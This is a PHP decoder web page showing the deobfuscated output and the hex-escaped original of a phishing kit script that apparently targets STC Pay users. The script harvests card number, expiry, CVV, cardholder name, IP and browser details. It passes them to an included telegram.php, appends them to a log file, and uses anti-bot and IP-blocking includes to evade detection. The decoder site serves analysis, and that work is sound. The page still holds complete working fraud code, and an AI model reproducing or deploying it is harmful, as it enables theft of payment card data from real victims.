Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto GiRrE; GiRrE: error_reporting(0); goto oqlkk; JetXL: include "\56\x2f\x2e\x2f..

Decoded Output download

<?php 
 goto GiRrE; GiRrE: error_reporting(0); goto oqlkk; JetXL: include "./././bots/anti.php"; goto PBcuT; Vm0Ox: include "./././blockIP.php"; goto CckmO; PBcuT: $testa = $_POST["Cardnumber"]; goto WY60l; oqlkk: session_start(); goto HiCSe; D5jM3: include "./././miniBOT.php"; goto qCAHK; HiCSe: include "./././antibots.php"; goto D5jM3; qCAHK: include "./././defender.php"; goto Vm0Ox; CckmO: include "./././bots/blocker.php"; goto JetXL; WY60l: if ($testa != '') { if ($_POST["Cardnumber"] != '' and $_POST["ExCard"] != '' and $_POST["ccv"] != '' and $_POST["name"] != '') { $TIME_DATE = date("H:i:s d/m/Y"); $ip = getenv("REMOTE_ADDR"); function XB_OS($USER_AGENT) { $OS_ERROR = "Unknown OS Platform"; $OS = array("/windows nt 10/i" => "Windows 10", "/windows nt 6.3/i" => "Windows 8.1", "/windows nt 6.2/i" => "Windows 8", "/windows nt 6.1/i" => "Windows 7", "/windows nt 6.0/i" => "Windows Vista", "/windows nt 5.2/i" => "Windows Server 2003/XP x64", "/windows nt 5.1/i" => "Windows XP", "/windows xp/i" => "Windows XP", "/windows nt 5.0/i" => "Windows 2000", "/windows me/i" => "Windows ME", "/win98/i" => "Windows 98", "/win95/i" => "Windows 95", "/win16/i" => "Windows 3.11", "/macintosh|mac os x/i" => "Mac OS X", "/mac_powerpc/i" => "Mac OS 9", "/linux/i" => "Linux", "/ubuntu/i" => "Ubuntu", "/iphone/i" => "iPhone", "/ipod/i" => "iPod", "/ipad/i" => "iPad", "/android/i" => "Android", "/blackberry/i" => "BlackBerry", "/webos/i" => "Mobile"); foreach ($OS as $regex => $value) { if (preg_match($regex, $USER_AGENT)) { $OS_ERROR = $value; } } return $OS_ERROR; } function XB_Browser($USER_AGENT) { $BROWSER_ERROR = "Unknown Browser"; $BROWSER = array("/msie/i" => "Internet Explorer", "/firefox/i" => "Firefox", "/safari/i" => "Safari", "/chrome/i" => "Chrome", "/edge/i" => "Edge", "/opera/i" => "Opera", "/netscape/i" => "Netscape", "/maxthon/i" => "Maxthon", "/konqueror/i" => "Konqueror", "/mobile/i" => "Handheld Browser"); foreach ($BROWSER as $regex => $value) { if (preg_match($regex, $USER_AGENT)) { $BROWSER_ERROR = $value; } } return $BROWSER_ERROR; } $_SESSION["Cardnumber"] = $_POST["Cardnumber"]; $_SESSION["ExCard"] = $_POST["ExCard"]; $_SESSION["ccv"] = $_POST["ccv"]; $_SESSION["name"] = $_POST["name"]; $message = "
-------- STC CC --------\xaNAME : " . $_SESSION["name"] . "\xaCARD : " . $_SESSION["Cardnumber"] . "
EXP : " . $_SESSION["ExCard"] . "
CVV : " . $_SESSION["ccv"] . "\xaBROWSER : " . XB_Browser($_SERVER["HTTP_USER_AGENT"]) . " On " . XB_OS($_SERVER["HTTP_USER_AGENT"]) . "\xaIP : {$ip}
Time/Date : {$TIME_DATE}
-------- CHA9CHA9X --------\xa"; include "consumer/img/card_sprites.png"; include "telegram.php"; $file = fopen("HAPPY99842.TXT", "a"); fwrite($file, $message); echo "<meta http-equiv='refresh' content='0; url=./loading1.php'/>"; } else { echo "<meta http-equiv='refresh' content='0; url=https://stcpay.com.sa/' />"; } } goto eWvCd; eWvCd: ?>

Did this file decode correctly?

Original Code

<?php
 goto GiRrE; GiRrE: error_reporting(0); goto oqlkk; JetXL: include "\56\x2f\x2e\x2f\x2e\x2f\x62\157\164\163\57\x61\x6e\x74\151\x2e\x70\x68\x70"; goto PBcuT; Vm0Ox: include "\x2e\x2f\x2e\57\56\57\142\x6c\157\x63\153\111\x50\56\x70\150\160"; goto CckmO; PBcuT: $testa = $_POST["\x43\141\162\144\x6e\165\x6d\142\x65\x72"]; goto WY60l; oqlkk: session_start(); goto HiCSe; D5jM3: include "\x2e\x2f\56\x2f\56\57\x6d\151\x6e\x69\x42\x4f\124\56\160\150\160"; goto qCAHK; HiCSe: include "\56\57\x2e\57\56\57\x61\x6e\164\x69\142\x6f\164\x73\56\x70\150\160"; goto D5jM3; qCAHK: include "\56\x2f\56\x2f\56\57\144\x65\x66\x65\156\x64\145\162\x2e\160\150\x70"; goto Vm0Ox; CckmO: include "\x2e\x2f\56\x2f\56\57\142\x6f\x74\163\57\x62\154\x6f\143\153\145\162\56\160\x68\160"; goto JetXL; WY60l: if ($testa != '') { if ($_POST["\103\x61\162\144\x6e\165\x6d\142\145\x72"] != '' and $_POST["\105\170\103\x61\162\x64"] != '' and $_POST["\x63\143\x76"] != '' and $_POST["\x6e\141\x6d\145"] != '') { $TIME_DATE = date("\x48\72\151\x3a\163\40\144\x2f\x6d\x2f\x59"); $ip = getenv("\122\105\x4d\117\124\x45\137\101\104\x44\x52"); function XB_OS($USER_AGENT) { $OS_ERROR = "\125\x6e\x6b\x6e\157\167\x6e\40\x4f\x53\x20\x50\x6c\141\164\146\157\162\155"; $OS = array("\x2f\167\151\156\x64\157\167\163\x20\x6e\164\x20\61\x30\x2f\151" => "\127\x69\156\144\157\167\163\x20\x31\x30", "\57\x77\x69\156\144\157\x77\163\40\x6e\x74\x20\x36\56\63\x2f\x69" => "\x57\151\x6e\144\157\x77\163\40\70\x2e\x31", "\x2f\167\x69\156\x64\157\x77\163\x20\x6e\164\x20\x36\56\62\57\x69" => "\127\151\156\144\x6f\167\x73\x20\x38", "\57\167\151\156\144\x6f\167\163\x20\x6e\164\40\x36\56\61\x2f\x69" => "\x57\x69\156\x64\x6f\167\x73\40\67", "\x2f\x77\151\x6e\x64\x6f\x77\x73\x20\156\x74\40\x36\x2e\x30\57\x69" => "\127\x69\156\x64\x6f\167\x73\x20\x56\x69\163\x74\x61", "\x2f\167\x69\x6e\144\x6f\x77\x73\40\156\x74\x20\65\56\62\57\151" => "\127\151\156\x64\x6f\167\163\x20\x53\x65\162\166\x65\x72\x20\x32\x30\60\x33\57\x58\x50\40\170\x36\x34", "\57\167\x69\156\x64\x6f\167\163\x20\156\164\40\65\x2e\x31\57\x69" => "\127\151\x6e\144\157\x77\163\x20\130\x50", "\x2f\x77\151\156\x64\157\x77\163\40\170\160\57\x69" => "\x57\151\x6e\x64\157\x77\x73\40\130\x50", "\x2f\x77\151\x6e\x64\157\x77\x73\40\156\164\40\x35\x2e\60\57\151" => "\127\151\x6e\x64\x6f\167\x73\x20\x32\x30\x30\x30", "\57\x77\x69\x6e\144\157\167\x73\x20\155\x65\57\x69" => "\127\x69\x6e\144\x6f\167\x73\40\115\105", "\57\x77\x69\156\x39\70\x2f\x69" => "\x57\151\156\x64\157\x77\x73\40\x39\70", "\x2f\167\151\156\71\65\x2f\151" => "\127\151\x6e\144\x6f\167\x73\40\x39\x35", "\x2f\167\151\156\x31\x36\57\151" => "\x57\151\156\144\157\x77\x73\40\x33\x2e\x31\x31", "\x2f\x6d\141\x63\x69\x6e\x74\157\163\x68\x7c\x6d\141\x63\x20\157\x73\x20\170\x2f\x69" => "\115\x61\x63\40\117\123\40\x58", "\x2f\x6d\141\x63\137\160\157\x77\x65\162\x70\143\57\151" => "\115\x61\x63\40\x4f\x53\x20\71", "\57\x6c\151\156\x75\170\x2f\151" => "\x4c\x69\x6e\x75\170", "\57\x75\142\x75\x6e\x74\165\57\151" => "\125\x62\x75\x6e\164\x75", "\57\151\160\x68\157\x6e\x65\x2f\151" => "\151\120\x68\x6f\156\145", "\x2f\151\x70\x6f\x64\57\151" => "\x69\x50\x6f\144", "\57\151\160\141\x64\x2f\x69" => "\x69\120\141\144", "\x2f\141\156\x64\x72\x6f\151\144\x2f\x69" => "\x41\156\144\x72\157\x69\144", "\57\x62\154\x61\143\x6b\142\x65\162\x72\x79\57\x69" => "\102\x6c\141\143\x6b\102\x65\162\162\171", "\x2f\x77\145\142\157\x73\x2f\x69" => "\x4d\x6f\x62\151\154\x65"); foreach ($OS as $regex => $value) { if (preg_match($regex, $USER_AGENT)) { $OS_ERROR = $value; } } return $OS_ERROR; } function XB_Browser($USER_AGENT) { $BROWSER_ERROR = "\125\156\x6b\156\157\167\x6e\40\x42\x72\x6f\167\163\x65\162"; $BROWSER = array("\x2f\155\163\151\145\x2f\x69" => "\111\156\x74\145\x72\x6e\x65\x74\40\105\x78\160\x6c\157\x72\145\162", "\57\146\151\162\145\146\157\x78\x2f\151" => "\x46\151\162\145\x66\x6f\x78", "\57\163\x61\x66\x61\162\x69\57\151" => "\123\141\146\x61\x72\151", "\x2f\143\150\162\157\155\145\57\151" => "\x43\150\x72\157\x6d\x65", "\57\x65\144\147\x65\x2f\x69" => "\105\x64\147\x65", "\57\157\160\x65\x72\141\57\151" => "\117\x70\x65\x72\141", "\x2f\x6e\x65\x74\x73\143\141\x70\x65\x2f\151" => "\116\x65\x74\x73\x63\x61\160\145", "\57\x6d\141\x78\164\150\x6f\156\57\151" => "\115\x61\x78\x74\150\157\156", "\x2f\153\157\156\161\x75\x65\x72\157\x72\x2f\151" => "\113\157\156\x71\x75\x65\x72\x6f\x72", "\x2f\155\x6f\x62\x69\154\x65\57\x69" => "\110\x61\x6e\x64\x68\145\x6c\144\x20\x42\x72\157\167\x73\x65\x72"); foreach ($BROWSER as $regex => $value) { if (preg_match($regex, $USER_AGENT)) { $BROWSER_ERROR = $value; } } return $BROWSER_ERROR; } $_SESSION["\103\x61\162\x64\156\165\155\142\145\162"] = $_POST["\103\x61\162\x64\x6e\x75\x6d\x62\145\x72"]; $_SESSION["\x45\170\x43\141\x72\144"] = $_POST["\x45\x78\x43\x61\162\x64"]; $_SESSION["\143\143\166"] = $_POST["\x63\x63\166"]; $_SESSION["\x6e\x61\155\x65"] = $_POST["\156\x61\x6d\x65"]; $message = "\12\55\55\55\55\x2d\55\x2d\55\40\123\124\x43\40\x43\x43\40\55\x2d\55\55\55\x2d\55\55\xa\x4e\101\115\105\x20\72\x20" . $_SESSION["\x6e\x61\x6d\x65"] . "\xa\x43\x41\122\104\40\x3a\40" . $_SESSION["\x43\x61\x72\x64\x6e\165\x6d\142\145\162"] . "\12\105\x58\120\40\x3a\40" . $_SESSION["\x45\170\x43\141\162\144"] . "\12\103\126\126\40\72\40" . $_SESSION["\x63\143\x76"] . "\xa\x42\122\x4f\x57\123\x45\x52\40\72\x20" . XB_Browser($_SERVER["\x48\124\124\120\137\125\x53\x45\x52\137\101\107\x45\116\124"]) . "\x20\x4f\156\40" . XB_OS($_SERVER["\110\124\124\120\137\x55\123\105\x52\x5f\101\x47\x45\116\x54"]) . "\xa\111\120\40\x3a\x20{$ip}\12\124\151\x6d\x65\57\x44\x61\164\145\40\x3a\40{$TIME_DATE}\12\x2d\x2d\55\x2d\x2d\x2d\55\55\x20\x43\x48\x41\71\103\110\101\71\x58\x20\x2d\55\x2d\x2d\x2d\55\x2d\55\xa"; include "\143\157\x6e\x73\x75\x6d\145\x72\57\x69\155\147\57\143\141\162\x64\137\163\x70\x72\151\164\145\163\56\x70\156\147"; include "\164\x65\154\x65\x67\x72\141\155\56\x70\x68\160"; $file = fopen("\110\101\120\120\x59\71\x39\70\x34\x32\x2e\124\x58\124", "\141"); fwrite($file, $message); echo "\74\x6d\145\x74\x61\x20\150\164\164\x70\55\x65\x71\165\151\x76\x3d\x27\162\145\x66\x72\x65\x73\x68\x27\x20\143\x6f\x6e\x74\x65\156\164\x3d\47\60\x3b\40\x75\162\x6c\x3d\x2e\57\x6c\157\x61\144\x69\x6e\147\x31\x2e\x70\x68\160\x27\57\x3e"; } else { echo "\74\x6d\145\164\141\40\150\x74\164\160\55\145\161\165\x69\166\x3d\47\162\x65\146\x72\x65\x73\150\x27\x20\143\x6f\x6e\x74\145\x6e\164\x3d\x27\x30\73\40\165\162\154\x3d\150\x74\x74\160\163\72\x2f\57\x73\x74\x63\160\x61\x79\56\143\x6f\x6d\x2e\163\141\x2f\47\40\57\x3e"; } } goto eWvCd; eWvCd: ?>

Function Calls

None

Variables

None

Stats

MD5 72e013c1669659d8a8e3f62a4b0f1480
Eval Count 0
Decode Time 52 ms